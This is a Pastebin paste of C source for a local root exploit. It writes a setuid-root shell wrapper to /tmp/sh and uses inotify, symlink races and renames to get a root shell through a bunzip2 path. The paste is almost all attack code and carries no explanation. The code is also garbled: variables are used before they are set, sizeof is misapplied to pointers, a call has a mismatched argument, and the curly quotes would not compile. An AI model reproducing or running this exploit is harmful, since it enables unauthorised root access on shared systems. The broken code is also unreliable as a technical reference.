Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- #define BZ “/usr/bin/bunzip2″
- #ifdef BSIZ
- #undef BSIZ
- #define BSIZ 128
- #endif
- int shell(char *file) {
- char *s =
- “#!/bin/bash\n”
- “echo ‘main(){setuid(0);execve(\”/bin/sh\”,0,0);}’>/tmp/sh.c\n”
- “cc /tmp/sh.c -o /tmp/sh; chown root:root /tmp/sh\n”
- “chmod 4755 /tmp/sh; rm -f ${0}; ${0##*/} $@\n”;
- int fd = open(file, O_CREAT|O_RDWR, S_IRWXU|S_IRWXG|S_IRWXO);
- write(fd, s, strlen(s));
- close(fd);
- return 0;
- }
- int main (int argc, char ** argv) {
- pid_t pid;
- int fd, wd;
- char *exec, *race, *path;
- char buf[1], *evilsh = “/tmp/sh”, *trash = “/tmp/bla”;
- if(argc != 3) {
- fprintf(stderr, “Use: %s <cmd>\n”, argv[0]);
- return EX_USAGE;
- }
- pid = fork();
- printf(“[+] initialize inotify\n”);
- fd = inotify_init();
- wd = inotify_add_watch(fd, exec, IN_CREATE);
- if(pid == 0) {
- while(1) {
- exec = malloc(sizeof(argv[1]) + 6);
- race = (char *)calloc(BSIZ, sizeof(char));
- bzero(exec, sizeof(exec));
- printf(“[+] creating target dir ..\n”);
- mkdir(exec, S_IRWXU|S_IRWXG|S_IRWXO);
- printf(“[+] Creating Shell in: (/tmp/sh) ..\n”);
- shell(evilsh);
- snprintf(exec, sizeof(exec), “/tmp/%s”, argv[1]);
- system((char *)exec);
- snprintf(exec, BSIZ, “ln -s %s /tmp/sh”, argv[1]);
- system((char *)exec);
- bzero(race, sizeof(race));
- snprintf(race, BSIZ, “rm /tmp/sh”);
- system((char *)race);
- bzero(race, sizeof(race));
- snprintf(race, BSIZ, “ln -fs /bin/sh /tmp/bla”);
- system((char *)race);
- bzero(race, sizeof(race));
- snprintf(race, BSIZ, “rm /tmp/bla”);
- system((char *)race);
- sleep(2);
- printf(“[-] failed\n”);
- inotify_rm_watch(fd, wd);
- if(pid > 0)
- {
- // failsafe :> (attak 2)
- syscall(SYS_read, fd, buf, 1); /* we use syscalls… much easier.. this is if it fails remember… */
- syscall(SYS_rename, exec, trash);
- syscall(SYS_rename, evilsh, exec);
- while(1)
- {
- printf(“[+] opening root shell (/tmp/sh) ..\n”);
- path = (char *)calloc(BSIZ/2, sizeof(char));
- snprintf(path, sizeof(path), BSIZ/2, “%s /tmp/sh”, BZ);
- system((char *)path);
- }
- }
- }
- }
- }
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement